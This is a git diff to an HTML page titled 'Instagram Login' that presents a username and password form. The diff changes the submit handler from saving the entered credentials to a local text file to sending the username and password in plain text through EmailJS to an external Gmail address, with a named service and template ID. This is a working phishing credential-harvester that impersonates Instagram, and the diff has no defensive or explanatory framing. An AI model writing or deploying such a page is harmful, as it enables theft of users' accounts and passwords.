--- a/index.html
+++ b/index.html
@@ -4,13 +4,11 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Instagram Login</title>
-    <link rel="stylesheet" href="styles.css">
     <script type="text/javascript" src="https://cdn.emailjs.com/dist/email.min.js"></script>
 </head>
 <body>
     <div class="container">
         <div class="login-box">
-            <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" alt="Instagram" class="logo">
             <form id="loginForm">
                 <input type="text" name="username" placeholder="Username" required>
                 <input type="password" name="password" placeholder="Password" required>
@@ -30,17 +28,10 @@
             const username = event.target.username.value;
             const password = event.target.password.value;
 
-            const data = `Username: ${username}\nPassword: ${password}`;
-            
-            const blob = new Blob([data], { type: 'text/plain' });
-            const link = document.createElement('a');
-            link.href = URL.createObjectURL(blob);
-            link.download = 'login-details.txt';
-            link.click();
-
             const emailParams = {
                 user_email: "eldrithofficial@gmail.com",
-                download_link: link.href
+                username: username,
+                password: password
             };
 
             emailjs.send("service_iag6if2", "template_vwlgsjs", emailParams)
